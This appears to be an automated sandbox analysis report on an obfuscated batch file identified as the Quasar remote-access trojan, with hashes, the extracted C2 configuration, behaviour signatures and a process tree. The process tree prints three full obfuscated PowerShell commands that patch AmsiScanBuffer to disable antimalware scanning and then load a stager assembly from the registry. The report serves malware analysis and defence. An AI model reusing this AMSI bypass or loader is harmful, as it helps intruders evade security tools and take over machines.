Analysis

  • max time kernel
    31s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-05-2024 18:37

General

  • Target

    Fixer-obf (1).bat

  • Size

    24KB

  • MD5

    03361badff8e7ecad39acd34f5f14749

  • SHA1

    c023fd9bd854f59f527141824e8fa6a311a57858

  • SHA256

    3026eb3fcde09d0d4e0695b3f74cb420b1e9d64b30c1ced3ed6a20f085a34d51

  • SHA512

    796e7466d4af6e2d52bc265b6a9d0881989cebd52ff6c6bae8d3817db61f50dc26e5982a6eb5fe16bf4e7d5cf3aa09a5a33e35c51c94a58d32438684fb88f979

  • SSDEEP

    384:UOpRAoUR7FKSVwpehr0kqTdyUO0OPniIjSFI:zpRrURhKKEehr0kqTIUO0OPnih+

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RPad

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-okPqrmZ8kNVUcS4Rp0

Attributes
  • encryption_key

    XmcBnPuLlN1e8SHIRR1z

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-LOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:332
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ba24417b-58f7-4531-aa72-036281d963a6}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3780
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{728e861a-1361-42cd-aed6-a76c568eb0d0}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3792
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{56368cca-9eea-4bfa-a978-42e8b58c5cd2}
          2⤵
            PID:2816
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:672
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:952
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:516
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:728
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1072
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1088
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1104
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:3016
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OfjEyyqFKXGb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DtpvIrVmBALSHK,[Parameter(Position=1)][Type]$PRDRGWqkKb)$rvzetgfPfoL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+'e'+[Char](109)+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'gat'+'e'+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+'s'+'s'+','+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+'n'+'si'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'Au'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$rvzetgfPfoL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+'l'+''+[Char](78)+'a'+[Char](109)+'e,H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$DtpvIrVmBALSHK).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+'e'+','+''+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rvzetgfPfoL.DefineMethod(''+'I'+'n'+'v'+'ok'+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+'Hi'+[Char](100)+''+[Char](101)+'B'+[Char](121)+'Si'+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+''+'S'+''+[Char](108)+''+'o'+''+[Char](116)+','+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$PRDRGWqkKb,$DtpvIrVmBALSHK).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $rvzetgfPfoL.CreateType();}$ilOFuNWHFSTBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'st'+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+'32'+[Char](46)+'Uns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+'i'+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$AwlIYqVyFlopCs=$ilOFuNWHFSTBJ.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+'s',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+'t'+'at'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JezuMJUuosuacWcryxm=OfjEyyqFKXGb @([String])([IntPtr]);$dfcDAsXdcZghHURbnTCjZG=OfjEyyqFKXGb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OTMUWoghqnD=$ilOFuNWHFSTBJ.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+'2'+'.d'+[Char](108)+''+[Char](108)+'')));$GkLirFMyDGaWIF=$AwlIYqVyFlopCs.Invoke($Null,@([Object]$OTMUWoghqnD,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+'a'+[Char](114)+''+[Char](121)+'A')));$tnFVdSGNahlssJtlr=$AwlIYqVyFlopCs.Invoke($Null,@([Object]$OTMUWoghqnD,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$GcdKdYj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GkLirFMyDGaWIF,$JezuMJUuosuacWcryxm).Invoke(''+'a'+''+'m'+''+[Char](115)+'i.d'+[Char](108)+''+'l'+'');$bKTqMCsepMNpcISCk=$AwlIYqVyFlopCs.Invoke($Null,@([Object]$GcdKdYj,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+'u'+''+'f'+'fe'+[Char](114)+'')));$VmJPBoByMh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tnFVdSGNahlssJtlr,$dfcDAsXdcZghHURbnTCjZG).Invoke($bKTqMCsepMNpcISCk,[uint32]8,4,[ref]$VmJPBoByMh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bKTqMCsepMNpcISCk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tnFVdSGNahlssJtlr,$dfcDAsXdcZghHURbnTCjZG).Invoke($bKTqMCsepMNpcISCk,[uint32]8,0x20,[ref]$VmJPBoByMh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+'E').GetValue(''+'$'+''+'7'+'7'+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4028
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UBCJyowzGMTB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uuHLIjLgAKaoXB,[Parameter(Position=1)][Type]$oqattUSjHo)$KHrxeJjrYSL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+'ul'+'e'+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+'S'+'e'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'i'+'C'+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$KHrxeJjrYSL.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+'ide'+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uuHLIjLgAKaoXB).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$KHrxeJjrYSL.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+','+[Char](78)+''+'e'+''+[Char](119)+'Slo'+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$oqattUSjHo,$uuHLIjLgAKaoXB).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $KHrxeJjrYSL.CreateType();}$nvZgUoSETFjSq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+'ro'+'s'+''+'o'+'ft'+'.'+''+[Char](87)+''+'i'+''+'n'+''+[Char](51)+'2.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+'i'+[Char](118)+'e'+[Char](77)+''+'e'+'t'+[Char](104)+'o'+'d'+''+'s'+'');$zhmsvrBayRXIFe=$nvZgUoSETFjSq.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jNyXOMRzjCvXJCcpMLr=UBCJyowzGMTB @([String])([IntPtr]);$dwCMSbqQDqTUsEFFHDCNPZ=UBCJyowzGMTB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gEaTTVhPRxo=$nvZgUoSETFjSq.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+'e'+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+'e'+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$DumfyjAcAkhGDz=$zhmsvrBayRXIFe.Invoke($Null,@([Object]$gEaTTVhPRxo,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$gmqqFDNpifjXdcyHm=$zhmsvrBayRXIFe.Invoke($Null,@([Object]$gEaTTVhPRxo,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'lPr'+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$NNYZSMq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DumfyjAcAkhGDz,$jNyXOMRzjCvXJCcpMLr).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$egdKOQCgqvYDLYMdN=$zhmsvrBayRXIFe.Invoke($Null,@([Object]$NNYZSMq,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+'B'+'u'+''+'f'+''+'f'+'e'+'r'+'')));$vPtOJzeAGj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmqqFDNpifjXdcyHm,$dwCMSbqQDqTUsEFFHDCNPZ).Invoke($egdKOQCgqvYDLYMdN,[uint32]8,4,[ref]$vPtOJzeAGj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$egdKOQCgqvYDLYMdN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gmqqFDNpifjXdcyHm,$dwCMSbqQDqTUsEFFHDCNPZ).Invoke($egdKOQCgqvYDLYMdN,[uint32]8,0x20,[ref]$vPtOJzeAGj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+'$'+''+[Char](55)+'7'+'s'+''+[Char](116)+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1084
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:1268
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:HHSMJrgrBUsB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$etKhyLdmiIlcek,[Parameter(Position=1)][Type]$ILfRXPxWyh)$eKZuWwDwJuQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+'e'+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+'ga'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'a'+'s'+'s'+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+'C'+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$eKZuWwDwJuQ.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$etKhyLdmiIlcek).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+'e,'+'M'+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$eKZuWwDwJuQ.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+'e',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'l'+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$ILfRXPxWyh,$etKhyLdmiIlcek).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+'m'+'e'+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $eKZuWwDwJuQ.CreateType();}$gMETTuZOZQGyp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+'in'+[Char](51)+'2'+[Char](46)+''+'U'+'ns'+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+'tiv'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+'s');$VmZZLgIhqeAwBn=$gMETTuZOZQGyp.GetMethod(''+[Char](71)+''+'e'+''+'t'+'Pro'+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JyfhsfCDqaooAKqnQdl=HHSMJrgrBUsB @([String])([IntPtr]);$BPuTDQsokZeWlUxpfIpUsm=HHSMJrgrBUsB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AiWBJeWsppo=$gMETTuZOZQGyp.GetMethod(''+'G'+'et'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+'el'+'3'+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$COXhUirOPYzieK=$VmZZLgIhqeAwBn.Invoke($Null,@([Object]$AiWBJeWsppo,[Object](''+[Char](76)+''+'o'+'ad'+[Char](76)+'ib'+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$svectFKYxNNHbhBaP=$VmZZLgIhqeAwBn.Invoke($Null,@([Object]$AiWBJeWsppo,[Object](''+'V'+'i'+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+'e'+'ct')));$cPsItzT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COXhUirOPYzieK,$JyfhsfCDqaooAKqnQdl).Invoke(''+[Char](97)+''+'m'+'si'+[Char](46)+''+[Char](100)+'l'+'l'+'');$MqPoTjWXrieqnBIPr=$VmZZLgIhqeAwBn.Invoke($Null,@([Object]$cPsItzT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$lMQQIWNueJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($svectFKYxNNHbhBaP,$BPuTDQsokZeWlUxpfIpUsm).Invoke($MqPoTjWXrieqnBIPr,[uint32]8,4,[ref]$lMQQIWNueJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MqPoTjWXrieqnBIPr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($svectFKYxNNHbhBaP,$BPuTDQsokZeWlUxpfIpUsm).Invoke($MqPoTjWXrieqnBIPr,[uint32]8,0x20,[ref]$lMQQIWNueJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                              PID:2368
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1152
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1220
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1284
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2888
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Drops file in System32 directory
                                    PID:1304
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1428
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                      1⤵
                                        PID:1444
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1452
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1540
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1588
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1632
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                1⤵
                                                  PID:1668
